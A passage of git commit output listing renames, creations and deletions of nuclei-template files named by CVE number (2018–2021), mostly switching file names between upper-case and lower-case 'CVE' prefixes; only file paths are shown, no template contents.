nuclei-templates/CVE-2018/CVE-2018-11709.yaml rename nuclei-templates/CVE-2018/{cve-2018-11776.yaml => CVE-2018-11776.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12054.yaml => CVE-2018-12054.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-1207.yaml => CVE-2018-1207.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-12300.yaml rename nuclei-templates/CVE-2018/{cve-2018-12634.yaml => CVE-2018-12634.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-12675.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-12909.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-13980.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-14064.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-14574.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-14918.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-15138.yaml rename nuclei-templates/CVE-2018/{cve-2018-15517.yaml => CVE-2018-15517.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15640.yaml => CVE-2018-15640.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15745.yaml => CVE-2018-15745.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-15961.yaml rename nuclei-templates/CVE-2018/{cve-2018-16059.yaml => CVE-2018-16059.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16288.yaml => CVE-2018-16288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16299.yaml => CVE-2018-16299.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16763.yaml => CVE-2018-16763.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-17246.yaml => CVE-2018-17246.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-17254.yaml => CVE-2018-17254.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-17422.yaml rename nuclei-templates/CVE-2018/{cve-2018-17431.yaml => CVE-2018-17431.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18069.yaml rename nuclei-templates/CVE-2018/{cve-2018-18323.yaml => CVE-2018-18323.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18608.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-18778.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19386.yaml rename nuclei-templates/CVE-2018/{cve-2018-19458.yaml => CVE-2018-19458.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19518.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19749.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19751.yaml rename nuclei-templates/CVE-2018/{cve-2018-19753.yaml => CVE-2018-19753.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19877.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19892.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19914.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19915.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-20009.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-20010.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20011.yaml rename nuclei-templates/CVE-2018/{cve-2018-2392.yaml => CVE-2018-2392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-3810.yaml rename nuclei-templates/CVE-2018/{cve-2018-5316.yaml => CVE-2018-5316.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-6910.yaml => CVE-2018-6910.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-7251.yaml => CVE-2018-7251.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7490.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7700.yaml rename nuclei-templates/CVE-2018/{cve-2018-7719.yaml => CVE-2018-7719.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-8727.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-9161.yaml rename nuclei-templates/CVE-2018/{cve-2018-9205.yaml => CVE-2018-9205.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-9995.yaml => CVE-2018-9995.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-1000671.yaml rename nuclei-templates/CVE-2018/{CVE-2018-1000856.yaml => cve-2018-1000856.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-11510.yaml => cve-2018-11510.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-11709.yaml rename nuclei-templates/CVE-2018/{CVE-2018-11759.yaml => cve-2018-11759.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-12031.yaml => cve-2018-12031.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-12300.yaml rename nuclei-templates/CVE-2018/{CVE-2018-12613.yaml => cve-2018-12613.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-12675.yaml rename nuclei-templates/CVE-2018/{CVE-2018-1273.yaml => cve-2018-1273.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-1335.yaml => cve-2018-1335.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-13980.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-14064.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-14574.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-14918.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-15138.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-15961.yaml rename nuclei-templates/CVE-2018/{CVE-2018-16671.yaml => cve-2018-16671.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-16716.yaml => cve-2018-16716.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-17422.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18069.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18608.yaml rename nuclei-templates/CVE-2018/{CVE-2018-18777.yaml => cve-2018-18777.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-18778.yaml rename nuclei-templates/CVE-2018/{CVE-2018-18925.yaml => cve-2018-18925.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-19136.yaml => cve-2018-19136.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19386.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19749.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19751.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19877.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19892.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19914.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19915.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-20009.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-20010.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20011.yaml rename nuclei-templates/CVE-2018/{CVE-2018-20985.yaml => cve-2018-20985.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-3810.yaml rename nuclei-templates/CVE-2018/{CVE-2018-5233.yaml => cve-2018-5233.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-7490.yaml rename nuclei-templates/CVE-2018/{CVE-2018-7600.yaml => cve-2018-7600.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-7700.yaml rename nuclei-templates/CVE-2018/{CVE-2018-8006.yaml => cve-2018-8006.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-8727.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-9161.yaml rename nuclei-templates/CVE-2018/{CVE-2018-9845.yaml => cve-2018-9845.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-0193.yaml => CVE-2019-0193.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-0230.yaml => CVE-2019-0230.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-1010287.yaml rename nuclei-templates/CVE-2019/{cve-2019-10475.yaml => CVE-2019-10475.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-10717.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-10758.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11013.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-11043.yaml rename nuclei-templates/CVE-2019/{cve-2019-12314.yaml => CVE-2019-12314.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12581.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12616.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12962.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-13396.yaml rename nuclei-templates/CVE-2019/{cve-2019-14205.yaml => CVE-2019-14205.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-14223.yaml => CVE-2019-14223.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-14251.yaml rename nuclei-templates/CVE-2019/{cve-2019-14322.yaml => CVE-2019-14322.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-14974.yaml rename nuclei-templates/CVE-2019/{cve-2019-15107.yaml => CVE-2019-15107.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-15858.yaml => CVE-2019-15858.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-15859.yaml => CVE-2019-15859.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16097.yaml => CVE-2019-16097.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16313.yaml => CVE-2019-16313.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-1653.yaml => CVE-2019-1653.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16662.yaml => CVE-2019-16662.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16759.yaml => CVE-2019-16759.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-17270.yaml => CVE-2019-17270.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-17382.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-17444.yaml rename nuclei-templates/CVE-2019/{cve-2019-17506.yaml => CVE-2019-17506.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-17538.yaml => CVE-2019-17538.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-1821.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18371.yaml rename nuclei-templates/CVE-2019/{cve-2019-18394.yaml => CVE-2019-18394.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18665.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-18818.yaml rename nuclei-templates/CVE-2019/{cve-2019-2725.yaml => CVE-2019-2725.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-2729.yaml => CVE-2019-2729.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-3401.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-3402.yaml rename nuclei-templates/CVE-2019/{cve-2019-3799.yaml => CVE-2019-3799.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-3912.yaml rename nuclei-templates/CVE-2019/{cve-2019-5127.yaml => CVE-2019-5127.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-6715.yaml => CVE-2019-6715.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7219.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7238.yaml rename nuclei-templates/CVE-2019/{cve-2019-8446.yaml => CVE-2019-8446.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-8449.yaml rename nuclei-templates/CVE-2019/{cve-2019-8451.yaml => CVE-2019-8451.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-8903.yaml => CVE-2019-8903.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9915.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9922.yaml rename nuclei-templates/CVE-2019/{CVE-2019-10068.yaml => cve-2019-10068.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-1010287.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-10717.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-10758.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-11013.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-11043.yaml rename nuclei-templates/CVE-2019/{CVE-2019-12461.yaml => cve-2019-12461.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-12581.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-12616.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-12962.yaml rename nuclei-templates/CVE-2019/{CVE-2019-13392.yaml => cve-2019-13392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-13396.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-14251.yaml rename nuclei-templates/CVE-2019/{CVE-2019-14470.yaml => cve-2019-14470.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-14974.yaml rename nuclei-templates/CVE-2019/{CVE-2019-15043.yaml => cve-2019-15043.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-15811.yaml => cve-2019-15811.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16332.yaml => cve-2019-16332.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16932.yaml => cve-2019-16932.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-17382.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-17444.yaml rename nuclei-templates/CVE-2019/{CVE-2019-17558.yaml => cve-2019-17558.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-1821.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18371.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18665.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-18818.yaml rename nuclei-templates/CVE-2019/{CVE-2019-19134.yaml => cve-2019-19134.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-19781.yaml => cve-2019-19781.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-19908.yaml => cve-2019-19908.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20141.yaml => cve-2019-20141.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20210.yaml => cve-2019-20210.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20354.yaml => cve-2019-20354.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20933.yaml => cve-2019-20933.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-3401.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-3402.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-3912.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7219.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7238.yaml rename nuclei-templates/CVE-2019/{CVE-2019-7275.yaml => cve-2019-7275.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-8449.yaml rename nuclei-templates/CVE-2019/{CVE-2019-9726.yaml => cve-2019-9726.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9915.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9922.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10220.yaml rename nuclei-templates/CVE-2020/{cve-2020-10546.yaml => CVE-2020-10546.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-10547.yaml => CVE-2020-10547.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10770.yaml rename nuclei-templates/CVE-2020/{cve-2020-11455.yaml => CVE-2020-11455.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-11546.yaml => CVE-2020-11546.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-11854.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11930.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11991.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-12259.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-12447.yaml rename nuclei-templates/CVE-2020/{cve-2020-12720.yaml => CVE-2020-12720.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-12800.yaml => CVE-2020-12800.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13405.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13483.yaml rename nuclei-templates/CVE-2020/{cve-2020-13700.yaml => CVE-2020-13700.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-13937.yaml => CVE-2020-13937.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-14179.yaml => CVE-2020-14179.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15148.yaml => CVE-2020-15148.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-15505.yaml rename nuclei-templates/CVE-2020/{cve-2020-16139.yaml => CVE-2020-16139.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-16920.yaml rename nuclei-templates/CVE-2020/{cve-2020-16952.yaml => CVE-2020-16952.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17362.yaml => CVE-2020-17362.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17518.yaml => CVE-2020-17518.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-18268.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-19282.yaml rename nuclei-templates/CVE-2020/{cve-2020-1938.yaml => CVE-2020-1938.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-1956.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-19625.yaml rename nuclei-templates/CVE-2020/{cve-2020-2096.yaml => CVE-2020-2096.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-20988.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-2103.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-2199.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-22210.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23015.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23517.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-24589.yaml rename nuclei-templates/CVE-2020/{cve-2020-27361.yaml => CVE-2020-27361.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-28188.yaml => CVE-2020-28188.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-28208.yaml => CVE-2020-28208.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-28351.yaml rename nuclei-templates/CVE-2020/{cve-2020-29395.yaml => CVE-2020-29395.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-29453.yaml => CVE-2020-29453.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-3187.yaml => CVE-2020-3187.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35338.yaml rename nuclei-templates/CVE-2020/{cve-2020-35476.yaml => CVE-2020-35476.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-35580.yaml => CVE-2020-35580.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-35598.yaml => CVE-2020-35598.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35749.yaml rename nuclei-templates/CVE-2020/{cve-2020-35848.yaml => CVE-2020-35848.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36287.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36365.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5307.yaml rename nuclei-templates/CVE-2020/{cve-2020-5410.yaml => CVE-2020-5410.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5775.yaml => CVE-2020-5775.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5847.yaml => CVE-2020-5847.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-6207.yaml => CVE-2020-6207.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-6308.yaml => CVE-2020-6308.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7048.yaml => CVE-2020-7048.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7209.yaml => CVE-2020-7209.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-7247.yaml rename nuclei-templates/CVE-2020/{cve-2020-7796.yaml => CVE-2020-7796.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-7943.yaml rename nuclei-templates/CVE-2020/{cve-2020-8115.yaml => CVE-2020-8115.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8163.yaml => CVE-2020-8163.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8209.yaml => CVE-2020-8209.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8497.yaml => CVE-2020-8497.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8512.yaml => CVE-2020-8512.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8515.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8771.yaml rename nuclei-templates/CVE-2020/{cve-2020-8813.yaml => CVE-2020-8813.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9036.yaml => CVE-2020-9036.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9054.yaml => CVE-2020-9054.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9315.yaml => CVE-2020-9315.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-9402.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-9496.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-10199.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-10220.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-10770.yaml rename nuclei-templates/CVE-2020/{CVE-2020-1147.yaml => cve-2020-1147.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-11854.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-11930.yaml rename nuclei-templates/CVE-2020/{CVE-2020-11978.yaml => cve-2020-11978.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-11991.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-12259.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-12447.yaml rename nuclei-templates/CVE-2020/{CVE-2020-13158.yaml => cve-2020-13158.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-13167.yaml => cve-2020-13167.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-13405.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-13483.yaml rename nuclei-templates/CVE-2020/{CVE-2020-13927.yaml => cve-2020-13927.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-14181.yaml => cve-2020-14181.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-14883.yaml => cve-2020-14883.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-15129.yaml => cve-2020-15129.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-15227.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-15505.yaml rename nuclei-templates/CVE-2020/{CVE-2020-15920.yaml => cve-2020-15920.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-16846.yaml => cve-2020-16846.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-18268.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-19282.yaml rename nuclei-templates/CVE-2020/{CVE-2020-19283.yaml => cve-2020-19283.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-1956.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-19625.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-20988.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-2103.yaml rename nuclei-templates/CVE-2020/{CVE-2020-22209.yaml => cve-2020-22209.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-22840.yaml => cve-2020-22840.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-23015.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-23517.yaml rename nuclei-templates/CVE-2020/{CVE-2020-23575.yaml => cve-2020-23575.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-24312.yaml => cve-2020-24312.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-24550.yaml => cve-2020-24550.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-24571.yaml => cve-2020-24571.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-24589.yaml rename nuclei-templates/CVE-2020/{CVE-2020-25223.yaml => cve-2020-25223.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-2551.yaml => cve-2020-2551.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-26073.yaml => cve-2020-26073.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-28351.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-35338.yaml rename nuclei-templates/CVE-2020/{CVE-2020-35713.yaml => cve-2020-35713.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-35749.yaml rename nuclei-templates/CVE-2020/{CVE-2020-3580.yaml => cve-2020-3580.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-35951.yaml => cve-2020-35951.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-36287.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-36365.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5307.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-7247.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-7943.yaml rename nuclei-templates/CVE-2020/{CVE-2020-7980.yaml => cve-2020-7980.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-8515.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8771.yaml rename nuclei-templates/CVE-2020/{CVE-2020-8982.yaml => cve-2020-8982.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-9047.yaml => cve-2020-9047.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-9402.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-9496.yaml rename nuclei-templates/CVE-2020/{CVE-20200924a.yaml => cve-20200924a.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-1497.yaml => CVE-2021-1497.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-20038.yaml => CVE-2021-20038.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-20114.yaml => CVE-2021-20114.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-20150.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21311.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21402.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21800.yaml rename nuclei-templates/CVE-2021/{cve-2021-21801.yaml => CVE-2021-21801.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-21803.yaml => CVE-2021-21803.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21816.yaml rename nuclei-templates/CVE-2021/{cve-2021-21975.yaml => CVE-2021-21975.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-22214.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24226.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24245.yaml rename nuclei-templates/CVE-2021/{cve-2021-24274.yaml => CVE-2021-24274.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24285.yaml => CVE-2021-24285.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24291.yaml => CVE-2021-24291.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24335.yaml => CVE-2021-24335.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24370.yaml rename nuclei-templates/CVE-2021/{cve-2021-24472.yaml => CVE-2021-24472.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24488.yaml rename nuclei-templates/CVE-2021/{cve-2021-24495.yaml => CVE-2021-24495.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24510.yaml rename nuclei-templates/CVE-2021/{cve-2021-24750.yaml => CVE-2021-24750.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24910.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24926.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24947.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24991.yaml delete mode 100644 